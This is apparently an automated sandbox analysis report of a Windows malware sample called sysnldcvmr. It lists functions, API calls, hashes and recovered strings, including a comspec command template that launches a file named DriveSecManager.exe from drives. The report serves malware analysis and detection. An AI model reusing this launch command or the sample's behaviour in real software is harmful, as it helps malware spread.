                                                                    • Instruction Fuzzy Hash: AC11DD71E4020A9BDB10CFD4D946BEEBBB4FB08708F118159E911B7280D7B85695CF99
                                                                    Function 0040D160 Relevance: 9.1, APIs: 6, Instructions: 80threadCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • EnterCriticalSection.KERNEL32(-00000004,00000000), ref: 0040D184
                                                                      • Part of subcall function 0040D250: WaitForSingleObject.KERNEL32(?,00000000), ref: 0040D290
                                                                      • Part of subcall function 0040D250: CloseHandle.KERNEL32(?), ref: 0040D2A9
                                                                    • CreateThread.KERNEL32(00000000,?,00000000,?,00000000,?), ref: 0040D1DF
                                                                    • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002), ref: 0040D21C
                                                                    • GetCurrentProcess.KERNEL32(00000000,00000000), ref: 0040D227
                                                                    • DuplicateHandle.KERNEL32(00000000), ref: 0040D22E
                                                                    • LeaveCriticalSection.KERNEL32(-00000004), ref: 0040D242
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.1635127951.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000007.00000002.1635111443.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000007.00000002.1635146545.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000007.00000002.1635164093.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_400000_sysnldcvmr.jbxd
                                                                    Similarity
                                                                    • API ID: CriticalCurrentHandleProcessSection$CloseCreateDuplicateEnterLeaveObjectSingleThreadWait
                                                                    • String ID:
                                                                    • API String ID: 2251373460-0
                                                                    • Opcode ID: 0f4ce32234228e51373a718084f49bdd165b62b4cc5873150e0a73e2794c4448
                                                                    • Instruction ID: b4a3372add05cffca1b77c7dac60b50b4844df58a08520f3d20c10534500f2db
                                                                    • Opcode Fuzzy Hash: 0f4ce32234228e51373a718084f49bdd165b62b4cc5873150e0a73e2794c4448
                                                                    • Instruction Fuzzy Hash: 6B31D6B4A00209EFDB04DF98D889F9EBBB5FB48304F1081A8E905A7391D775EA95CF54
                                                                    Function 00407370 Relevance: 9.1, APIs: 6, Instructions: 65sleepCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.1635127951.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000007.00000002.1635111443.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000007.00000002.1635146545.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000007.00000002.1635164093.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_400000_sysnldcvmr.jbxd
                                                                    Similarity
                                                                    • API ID: Sleep$CountTickrandsrand
                                                                    • String ID:
                                                                    • API String ID: 3488799664-0
                                                                    • Opcode ID: c117d04b20163f9f953f828aeedb65ed40a1637f383e1ba8009b9b023e8ebc44
                                                                    • Instruction ID: b6b36855a0edcd25512206b50fb5473dda965f97846ebbbd8b428d1493e324f4
                                                                    • Opcode Fuzzy Hash: c117d04b20163f9f953f828aeedb65ed40a1637f383e1ba8009b9b023e8ebc44
                                                                    • Instruction Fuzzy Hash: 1D21D875E04208FBD704DF60D8856AE7B31EB45304F10C47AED026B381DA79AA80DB56
                                                                    Function 00408EB0 Relevance: 9.1, APIs: 6, Instructions: 60COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.1635127951.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000007.00000002.1635111443.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000007.00000002.1635146545.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000007.00000002.1635164093.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_400000_sysnldcvmr.jbxd
                                                                    Similarity
                                                                    • API ID: _allshl_aullshr
                                                                    • String ID:
                                                                    • API String ID: 673498613-0
                                                                    • Opcode ID: b6c741ae3234a389a253b0a23420a389dbca14ef940f6469a5e268d1ed8ccdf8
                                                                    • Instruction ID: 40a613cc88bb75a9b4956eb5c221db2524b4544d5556699ad57a8543b44bc28a
                                                                    • Opcode Fuzzy Hash: b6c741ae3234a389a253b0a23420a389dbca14ef940f6469a5e268d1ed8ccdf8
                                                                    • Instruction Fuzzy Hash: 3B111F32510518AB8B10EF6FC44268ABBD6EF843A1B25C136FC2CDF359D634DA514BD8
                                                                    Function 00401200 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 106networkCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • memcpy.NTDLL(00000004,00000000,?,?), ref: 00401258
                                                                    • htons.WS2_32(?), ref: 00401281
                                                                    • sendto.WS2_32(?,00000000,?,00000000,?,00000010), ref: 004012A9
                                                                    • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 004012BE
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.1635127951.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000007.00000002.1635111443.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000007.00000002.1635146545.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000007.00000002.1635164093.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_400000_sysnldcvmr.jbxd
                                                                    Similarity
                                                                    • API ID: ExchangeInterlockedhtonsmemcpysendto
                                                                    • String ID: pdu
                                                                    • API String ID: 2164660128-2320407122
                                                                    • Opcode ID: ad0a036109145f249a08ec8e181f2c3f15924be3383878ad7f1db0ee6fe723d0
                                                                    • Instruction ID: d4e165de5104959f260b85937ca272364f863e3dc64df769d8e1baf9f078371f
                                                                    • Opcode Fuzzy Hash: ad0a036109145f249a08ec8e181f2c3f15924be3383878ad7f1db0ee6fe723d0
                                                                    • Instruction Fuzzy Hash: 5831A5762083009BC710DF69D884A9BBBE4AFC9714F04456EFD9897381D634D919C7E7
                                                                    Function 00406460 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 94comCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • CoInitialize.OLE32(00000000), ref: 0040646B
                                                                    • CoCreateInstance.OLE32(00412438,00000000,00000001,00412418,?), ref: 00406483
                                                                    • wsprintfW.USER32 ref: 004064B6
                                                                    Strings
                                                                    • /c start %s & start %s\DriveSecManager.exe, xrefs: 004064AA
                                                                    • %comspec%, xrefs: 004064BF
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.1635127951.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000007.00000002.1635111443.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000007.00000002.1635146545.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000007.00000002.1635164093.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_400000_sysnldcvmr.jbxd
                                                                    Similarity
                                                                    • API ID: CreateInitializeInstancewsprintf
                                                                    • String ID: %comspec%$/c start %s & start %s\DriveSecManager.exe
                                                                    • API String ID: 2038452267-3640840557
                                                                    • Opcode ID: 4992a1b2003cae7c91a3a7b86177e2a1dc405837f2ddce0001cb864d4f031ccd
                                                                    • Instruction ID: 827debbb99fb5d40cfb779b5d8ae5ab415415813199b490bc36420c15ce2df05
                                                                    • Opcode Fuzzy Hash: 4992a1b2003cae7c91a3a7b86177e2a1dc405837f2ddce0001cb864d4f031ccd
                                                                    • Instruction Fuzzy Hash: 0C31D875A40208BFDB04DF98D884FDEB7B5EF88704F208199F619A73A4C674AE81CB54
                                                                    Function 0040D410 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 47COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • EnterCriticalSection.KERNEL32(?), ref: 0040D429
                                                                    • CloseHandle.KERNEL32(?), ref: 0040D458
                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 0040D467
                                                                    • DeleteCriticalSection.KERNEL32(?), ref: 0040D474
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.1635127951.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000007.00000002.1635111443.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000007.00000002.1635146545.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000007.00000002.1635164093.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_400000_sysnldcvmr.jbxd
                                                                    Similarity
                                                                    • API ID: CriticalSection$CloseDeleteEnterHandleLeave
                                                                    • String ID: .Mw
                                                                    • API String ID: 3102160386-2453323595
                                                                    • Opcode ID: 8282c1fc67bed24bc2a31477c864fcafb026bcbe456c45579f2b949671041cbb
                                                                    • Instruction ID: 6cfc4b79706d1bba1c4fbc1f32f5c608acb329628ab24e105d00911b1e03cc11
                                                                    • Opcode Fuzzy Hash: 8282c1fc67bed24bc2a31477c864fcafb026bcbe456c45579f2b949671041cbb
                                                                    • Instruction Fuzzy Hash: AC112D74D00208EFDB08DF94D984A9EBB75FF48309F2081A9E806AB341D734EE95DB95
                                                                    Function 00401330 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42synchronizationCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • SetEvent.KERNEL32(6856006A,00000000,?,0040143A,00000000,?,?,?,0040D55D,00000000), ref: 00401346
                                                                    • WaitForSingleObject.KERNEL32(00401100,000000FF,?,0040143A,00000000,?,?,?,0040D55D,00000000), ref: 00401352
                                                                    • CloseHandle.KERNEL32(00401100,?,0040143A,00000000,?,?,?,0040D55D,00000000), ref: 0040135C
                                                                      • Part of subcall function 0040A1B0: HeapFree.KERNEL32(?,00000000,00402612,?,00402612,?), ref: 0040A20B
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.1635127951.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000007.00000002.1635111443.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000007.00000002.1635146545.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000007.00000002.1635164093.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_400000_sysnldcvmr.jbxd
                                                                    Similarity
                                                                    • API ID: CloseEventFreeHandleHeapObjectSingleWait
                                                                    • String ID: pdu$.Mw
                                                                    • API String ID: 309973729-3908477397
                                                                    • Opcode ID: c39a517e5d4f3b53a3b778486be7aa7f806f5e58db1bfdeefdb0bb5bfa2d2843
                                                                    • Instruction ID: 8798272c393d99dde58c69795aa0ec1d050c8eff8ee51a61ed5db2294712bea8
                                                                    • Opcode Fuzzy Hash: c39a517e5d4f3b53a3b778486be7aa7f806f5e58db1bfdeefdb0bb5bfa2d2843
                                                                    • Instruction Fuzzy Hash: 400186765003109BCB21AF55ECC4E9B7779AF48311B044679FD056B396C638E85487A5
                                                                    Function 00401820 Relevance: 7.6, APIs: 5, Instructions: 116COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 00401846
                                                                    • InterlockedDecrement.KERNEL32(?), ref: 004018B1
                                                                      • Part of subcall function 004017A0: EnterCriticalSection.KERNEL32(?,?,?,?,0040186C,?,?), ref: 004017B0
                                                                      • Part of subcall function 004017A0: InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 004017C0
                                                                      • Part of subcall function 004017A0: LeaveCriticalSection.KERNEL32(?,?,?,0040186C,?,?), ref: 004017CD
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.1635127951.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000007.00000002.1635111443.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000007.00000002.1635146545.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000007.00000002.1635164093.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_400000_sysnldcvmr.jbxd
                                                                    Similarity
                                                                    • API ID: Interlocked$CriticalExchangeSection$DecrementEnterLeave
                                                                    • String ID:
                                                                    • API String ID: 3966618661-0
                                                                    • Opcode ID: 3b7509c36c549ccc631e3d4bc530e991b8502da243600c65769ed081249f64d8
                                                                    • Instruction ID: 5b2b6301c056c53cf24b756eb28b55477e9028745ee4fe4862f5ad68d4db2f6a
                                                                    • Opcode Fuzzy Hash: 3b7509c36c549ccc631e3d4bc530e991b8502da243600c65769ed081249f64d8
                                                                    • Instruction Fuzzy Hash: 1841B371604A02AFC714EB39D848797F7A4BF88310F14827EE82D933D1E735A855CB99
                                                                    Function 00408A90 Relevance: 7.5, APIs: 5, Instructions: 48COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.1635127951.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000007.00000002.1635111443.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000007.00000002.1635146545.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000007.00000002.1635164093.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_400000_sysnldcvmr.jbxd
                                                                    Similarity
                                                                    • API ID: _allshl
                                                                    • String ID:
                                                                    • API String ID: 435966717-0
                                                                    • Opcode ID: 6ce938123fd61f227b6de6a29a17a105f2c46d2c2b520e971cfa59f1b0e97cc1
                                                                    • Instruction ID: 2f682f979519ea9f46037cdaf014f1fa89077d02b7b0d9f1a8f9fce332e03f2e
                                                                    • Opcode Fuzzy Hash: 6ce938123fd61f227b6de6a29a17a105f2c46d2c2b520e971cfa59f1b0e97cc1
                                                                    • Instruction Fuzzy Hash: 62F03672A11419D79720EFFFD4424CAF7E59F88354B118676F818E3270E5709D1146F5
                                                                    Function 00406320 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 36COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetDriveTypeW.KERNEL32(004062FF), ref: 0040632D
                                                                    • QueryDosDeviceW.KERNEL32(004062FF,?,00000208), ref: 0040636C
                                                                    • StrCmpNW.SHLWAPI(?,\??\,00000004), ref: 00406384
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.1635127951.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000007.00000002.1635111443.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000007.00000002.1635146545.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000007.00000002.1635164093.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_400000_sysnldcvmr.jbxd
                                                                    Similarity
                                                                    • API ID: DeviceDriveQueryType
                                                                    • String ID: \??\
                                                                    • API String ID: 1681518211-3047946824
                                                                    • Opcode ID: 2ed414b0295d9b290f281463d65c6dfdef2d1200349873c82773e40805adb805
                                                                    • Instruction ID: affcc5b958b6168f9f245bae438771e9e0bc574488939cd978d138ae5b874539
                                                                    • Opcode Fuzzy Hash: 2ed414b0295d9b290f281463d65c6dfdef2d1200349873c82773e40805adb805
                                                                    • Instruction Fuzzy Hash: 4101ECB0A4020CEBCB20DF55DD496DEB7B5AB04704F01C0BAAA09A7280D6759AD5CF99
                                                                    Function 00407310 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 35threadCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • memcpy.NTDLL(00000000,?,?), ref: 00407338
                                                                    • CreateThread.KERNEL32(00000000,00000000,00407370,00000000,00000000,00000000), ref: 0040735A
                                                                    • CloseHandle.KERNEL32(00000000), ref: 00407361
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.1635127951.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000007.00000002.1635111443.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000007.00000002.1635146545.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000007.00000002.1635164093.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_400000_sysnldcvmr.jbxd
                                                                    Similarity
                                                                    • API ID: CloseCreateHandleThreadmemcpy
                                                                    • String ID: .Mw
                                                                    • API String ID: 2064604595-2453323595
                                                                    • Opcode ID: 025e05a46128585bda8c63f35f43421881db84198d69b8bbc1a6440a37f96729
                                                                    • Instruction ID: f93afe995e2a8aed0921a04be4342d20ba97acab7f8849ac526c8a5d2aa2879c
                                                                    • Opcode Fuzzy Hash: 025e05a46128585bda8c63f35f43421881db84198d69b8bbc1a6440a37f96729
                                                                    • Instruction Fuzzy Hash: 20F090B1A04308FBDB00DFA4EC46F9E7378BB48704F244468F908A73C1D675AA10CB59
                                                                    Function 0040E770 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 28fileCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • CreateFileW.KERNEL32(00406BF0,80000000,00000001,00000000,00000003,00000000,00000000,00406BF0), ref: 0040E790
                                                                    • GetFileSize.KERNEL32(000000FF,00000000), ref: 0040E7A5
                                                                    • CloseHandle.KERNEL32(000000FF), ref: 0040E7B2
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.1635127951.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000007.00000002.1635111443.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000007.00000002.1635146545.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000007.00000002.1635164093.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_400000_sysnldcvmr.jbxd
                                                                    Similarity
                                                                    • API ID: File$CloseCreateHandleSize
                                                                    • String ID: .Mw
                                                                    • API String ID: 1378416451-2453323595
                                                                    • Opcode ID: 40331b06137dd1b3e9361709e89bde31eef538c005570258d90ec78dd49f2017
                                                                    • Instruction ID: 089911091b4f8663884f4f3f40455582f6b765449e30803f2281244f10637e16
                                                                    • Opcode Fuzzy Hash: 40331b06137dd1b3e9361709e89bde31eef538c005570258d90ec78dd49f2017
                                                                    • Instruction Fuzzy Hash: FDF0C074A40308FBEB20DFA4DC49FDDBB78EB04711F208695FA05BB2D0D6B56A918B54
                                                                    Function 00401100 Relevance: 6.1, APIs: 4, Instructions: 86synchronizationCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • ioctlsocket.WS2_32 ref: 0040112B
                                                                    • recvfrom.WS2_32 ref: 0040119C
                                                                    • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 004011B2
                                                                    • WaitForSingleObject.KERNEL32(?,00000001), ref: 004011D3
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.1635127951.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000007.00000002.1635111443.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000007.00000002.1635146545.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000007.00000002.1635164093.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_400000_sysnldcvmr.jbxd
                                                                    Similarity
                                                                    • API ID: ExchangeInterlockedObjectSingleWaitioctlsocketrecvfrom
                                                                    • String ID:
                                                                    • API String ID: 3980219359-0
                                                                    • Opcode ID: 9043bbde74ed34bf2cc191a38aea973bc9bd065bac7bbf52c4b9ffe402cd0893
                                                                    • Instruction ID: e1641215121ef27e00d374ead4771de002ae7678dd3977a0c2b5eb1dd4af8410
                                                                    • Opcode Fuzzy Hash: 9043bbde74ed34bf2cc191a38aea973bc9bd065bac7bbf52c4b9ffe402cd0893
                                                                    • Instruction Fuzzy Hash: BE21B1B11043016FD304DF65D884A6BB7E8AF88318F004A3EF559A6291E774D948C7AA
                                                                    Function 00401F50 Relevance: 6.1, APIs: 4, Instructions: 73networkCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetQueuedCompletionStatus.KERNEL32(?,?,?,?,000000FF), ref: 00401F83
                                                                    • WSAGetOverlappedResult.WS2_32(?,?,?,00000000,?), ref: 00401FAF
                                                                    • WSAGetLastError.WS2_32 ref: 00401FB9
                                                                    • GetQueuedCompletionStatus.KERNEL32(?,?,?,?,000000FF), ref: 00401FF9
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.1635127951.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000007.00000002.1635111443.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000007.00000002.1635146545.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000007.00000002.1635164093.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_400000_sysnldcvmr.jbxd
                                                                    Similarity
                                                                    • API ID: CompletionQueuedStatus$ErrorLastOverlappedResult
                                                                    • String ID:
                                                                    • API String ID: 2074799992-0
                                                                    • Opcode ID: 0873c704f9b42db8694245f3ff021b9bdebcd9b4b0cbd7409a356cfb69af86d5
                                                                    • Instruction ID: 923efa3f85c100d8dcf87aa4bb405070ff806fabc372267044aefe38fa55a991
                                                                    • Opcode Fuzzy Hash: 0873c704f9b42db8694245f3ff021b9bdebcd9b4b0cbd7409a356cfb69af86d5
                                                                    • Instruction Fuzzy Hash: B72131715083119BC200DF55D844D6BB7E8BFCCB54F044A2DF598A3291D774EA49CBAA
                                                                    Function 00401C50 Relevance: 6.1, APIs: 4, Instructions: 59networksleepCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • WSARecv.WS2_32(?,?,00000001,?,?,?,00000000), ref: 00401C88
                                                                    • WSAGetLastError.WS2_32(?,?,004021A5,00000000), ref: 00401C90
                                                                    • Sleep.KERNEL32(00000001,?,?,004021A5,00000000), ref: 00401CA6
                                                                    • WSARecv.WS2_32(?,?,00000001,?,?,?,00000000), ref: 00401CCC
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.1635127951.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000007.00000002.1635111443.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000007.00000002.1635146545.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000007.00000002.1635164093.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_400000_sysnldcvmr.jbxd
                                                                    Similarity
                                                                    • API ID: Recv$ErrorLastSleep
                                                                    • String ID:
                                                                    • API String ID: 3668019968-0
                                                                    • Opcode ID: 632ea2d54cc4383f5132f6b2993607fdd6e2119cf45a08eb7173c4bd646593aa
                                                                    • Instruction ID: 470b9b0004fc9485880b3b0232d8394a6163a25caab740c915041083b8486df8
                                                                    • Opcode Fuzzy Hash: 632ea2d54cc4383f5132f6b2993607fdd6e2119cf45a08eb7173c4bd646593aa
                                                                    • Instruction Fuzzy Hash: 8811AD72148305AFD310CF65EC84AEBB7ECEB88710F40092EF945D2150E6B9E949A7B6
                                                                    Function 00401AE0 Relevance: 6.0, APIs: 4, Instructions: 49networksleepCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • WSASend.WS2_32(?,?,00000001,?,00000000,?,00000000), ref: 00401B0C
                                                                    • WSAGetLastError.WS2_32 ref: 00401B12
                                                                    • Sleep.KERNEL32(00000001), ref: 00401B28
                                                                    • WSASend.WS2_32(?,?,00000001,?,00000000,?,00000000), ref: 00401B4A
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.1635127951.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000007.00000002.1635111443.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000007.00000002.1635146545.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000007.00000002.1635164093.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_400000_sysnldcvmr.jbxd
                                                                    Similarity
                                                                    • API ID: Send$ErrorLastSleep
                                                                    • String ID:
                                                                    • API String ID: 2121970615-0
                                                                    • Opcode ID: b06a38cb9fde64199f830136d194dacddc283b62bd49c201cde61758c607cabc
                                                                    • Instruction ID: 56798eeddd779857b304cdb020dc52eae5646efd672cabe94dca1e5c1b4e91c2
                                                                    • Opcode Fuzzy Hash: b06a38cb9fde64199f830136d194dacddc283b62bd49c201cde61758c607cabc
                                                                    • Instruction Fuzzy Hash: 90014B712483046EE7209B96DC88F9B77A8EBC8711F408429F608DA2D0D7B5A9459B7A
                                                                    Function 004017A0 Relevance: 6.0, APIs: 4, Instructions: 47COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • EnterCriticalSection.KERNEL32(?,?,?,?,0040186C,?,?), ref: 004017B0
                                                                    • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 004017C0
                                                                    • LeaveCriticalSection.KERNEL32(?,?,?,0040186C,?,?), ref: 004017CD
                                                                    • LeaveCriticalSection.KERNEL32(?,?,?,0040186C,?,?), ref: 00401808
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.1635127951.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000007.00000002.1635111443.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000007.00000002.1635146545.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000007.00000002.1635164093.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_400000_sysnldcvmr.jbxd
                                                                    Similarity
                                                                    • API ID: CriticalSection$Leave$EnterExchangeInterlocked
                                                                    • String ID:
                                                                    • API String ID: 2223660684-0
                                                                    • Opcode ID: 7e6606f5c14d1b9ede2abea3a5762152510b51c5bdf13f408023d0105cc90a62
                                                                    • Instruction ID: 0184f799374b3cbd514a588550e5351e3808897b1395f0a2de410330185c2ead
                                                                    • Opcode Fuzzy Hash: 7e6606f5c14d1b9ede2abea3a5762152510b51c5bdf13f408023d0105cc90a62
                                                                    • Instruction Fuzzy Hash: DF01F7352423009FC3209F26EC44ADB77E8AF49711F04443EE80697650EB34E545DB28
                                                                    Function 00406FE0 Relevance: 6.0, APIs: 4, Instructions: 22memoryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • CoInitializeEx.OLE32(00000000,00000002,?,?,00407A2A), ref: 00406FE8
                                                                    • SysAllocString.OLEAUT32(00416268), ref: 00406FF3
                                                                    • CoUninitialize.OLE32 ref: 00407018
                                                                      • Part of subcall function 00407030: SysFreeString.OLEAUT32(00000000), ref: 00407248
                                                                    • SysFreeString.OLEAUT32(00000000), ref: 00407012
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.1635127951.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000007.00000002.1635111443.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000007.00000002.1635146545.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000007.00000002.1635164093.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
